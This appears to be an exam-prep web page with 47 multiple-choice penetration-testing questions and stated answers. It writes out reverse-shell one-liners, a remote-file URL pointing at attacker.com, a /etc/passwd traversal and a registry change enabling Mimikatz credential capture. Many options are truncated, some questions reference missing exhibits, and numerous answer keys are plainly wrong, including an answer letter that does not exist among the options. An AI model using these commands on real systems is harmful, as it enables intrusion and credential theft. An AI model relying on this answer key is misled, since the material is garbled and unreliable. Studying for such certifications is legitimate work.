لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت

السؤال #1
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
A. The client has applied a hot fix without updating the version
B. The threat landscape has significantly changed
C. The client has updated their codebase with new features
D. Thera are currently no known exploits for this vulnerability
عرض الإجابة
اجابة صحيحة: A
السؤال #2
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan. The tester runs the following command: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host
عرض الإجابة
اجابة صحيحة: A
السؤال #3
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
عرض الإجابة
اجابة صحيحة: D
السؤال #4
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
عرض الإجابة
اجابة صحيحة: B
السؤال #5
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
عرض الإجابة
اجابة صحيحة: A
السؤال #6
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
عرض الإجابة
اجابة صحيحة: B
السؤال #7
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. Implement new training to be aware of the risks in accessing the application
C. Implement an ACL to restrict access to the application exclusively to the finance department
D. Require payroll users to change the passwords used to authenticate to the application
عرض الإجابة
اجابة صحيحة: C
السؤال #8
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications
D. Search social media for information technology employees who post information about the technologies they work with
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
عرض الإجابة
اجابة صحيحة: DE
السؤال #9
Given the following script: Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
عرض الإجابة
اجابة صحيحة: C
السؤال #10
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
عرض الإجابة
اجابة صحيحة: C
السؤال #11
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
عرض الإجابة
اجابة صحيحة: A
السؤال #12
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
عرض الإجابة
اجابة صحيحة: BC
السؤال #13
Given the following: http://example.com/download.php?id-.../.../.../etc/passwd Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
عرض الإجابة
اجابة صحيحة: C
السؤال #14
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
A. Run the application through a dynamic code analyzer
B. Employ a fuzzing utility
C. Decompile the application
D. Check memory allocations
عرض الإجابة
اجابة صحيحة: D
السؤال #15
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist
B. Block URL redirections
C. Double URL encode the parameters
D. Stop external calls from the application
عرض الإجابة
اجابة صحيحة: B
السؤال #16
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
عرض الإجابة
اجابة صحيحة: AB
السؤال #17
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identity and eliminate inline SQL statements from the code
B. Identify and eliminate dynamic SQL from stored procedures
C. Identify and sanitize all user inputs
D. Use a whitelist approach for SQL statements
E. Use a blacklist approach for SQL statements
F. Identify the source of malicious input and block the IP address
عرض الإجابة
اجابة صحيحة: CD
السؤال #18
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
عرض الإجابة
اجابة صحيحة: A
السؤال #19
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. use auxiliary/server/socks4a
عرض الإجابة
اجابة صحيحة: A
السؤال #20
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks: Code review Updates to firewall settings Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
عرض الإجابة
اجابة صحيحة: A
السؤال #21
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
عرض الإجابة
اجابة صحيحة: B
السؤال #22
The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
عرض الإجابة
اجابة صحيحة: B
السؤال #23
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine
B. Disable remote logons for local administrators
C. Require multifactor authentication for all logins
D. Increase minimum password complexity requirements
E. Apply additional network access control
F. Enable full-disk encryption on every workstation
G. Segment each host into its own VLAN
عرض الإجابة
اجابة صحيحة: CDE
السؤال #24
Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made public
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
عرض الإجابة
اجابة صحيحة: D
السؤال #25
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
A. Obtain staff information by calling the company and using social engineering techniques
B. Visit the client and use impersonation to obtain information from staff
C. Send spoofed emails to staff to see if staff will respond with sensitive information
D. Search the internet for information on staff such as social networking sites
عرض الإجابة
اجابة صحيحة: D
السؤال #26
Click the exhibit button. Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
A. Arbitrary code execution
B. Session hijacking
C. SQL injection
D. Login credential brute-forcing
E. Cross-site request forgery
عرض الإجابة
اجابة صحيحة: BD
السؤال #27
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
عرض الإجابة
اجابة صحيحة: D
السؤال #28
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
عرض الإجابة
اجابة صحيحة: A
السؤال #29
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
عرض الإجابة
اجابة صحيحة: D
السؤال #30
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM. Which of the following is MOST important for confirmation?
A. Unsecure service and protocol configuration
B. Running SMB and SMTP service
C. Weak password complexity and user account
D. Misconfiguration
عرض الإجابة
اجابة صحيحة: A
السؤال #31
Black box penetration testing strategy provides the tester with:
A. a target list
B. a network diagram
C. source code
D. privileged credentials
عرض الإجابة
اجابة صحيحة: D
السؤال #32
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
عرض الإجابة
اجابة صحيحة: A
السؤال #33
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
عرض الإجابة
اجابة صحيحة: D
السؤال #34
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method
B. HTTP OPTIONS method
C. HTTP PUT method
D. HTTP TRACE method
عرض الإجابة
اجابة صحيحة: A
السؤال #35
After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?
A. SOW
B. NDA
C. EULAD
عرض الإجابة
اجابة صحيحة: D
السؤال #36
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
عرض الإجابة
اجابة صحيحة: AC
السؤال #37
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
عرض الإجابة
اجابة صحيحة: A
السؤال #38
A penetration tester runs the following from a compromised ‘python -c ‘ import pty;pty.spawn (“/bin/bash”) ’. Which of the following actions are the tester taking?
A. Removing the Bash history
B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
عرض الإجابة
اجابة صحيحة: B
السؤال #39
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
عرض الإجابة
اجابة صحيحة: D
السؤال #40
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSDI broadcast flood
عرض الإجابة
اجابة صحيحة: B
السؤال #41
A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5 The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet
B. Nmap results contain a false positive for port 23
C. Port 22 was filtered
D. The service is running on a non-standard port
عرض الإجابة
اجابة صحيحة: A
السؤال #42
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
عرض الإجابة
اجابة صحيحة: A
السؤال #43
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i:
B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST
C. Download the GHOST file to a Linux system and compile gcc -o GHOST
D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i:
عرض الإجابة
اجابة صحيحة: C
السؤال #44
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
A. Horizontally escalate privileges
B. Scrape the page for hidden fields
C. Analyze HTTP response code
D. Search for HTTP headers
عرض الإجابة
اجابة صحيحة: D
السؤال #45
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
عرض الإجابة
اجابة صحيحة: D
السؤال #46
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
عرض الإجابة
اجابة صحيحة: A
السؤال #47
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
عرض الإجابة
اجابة صحيحة: B

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف: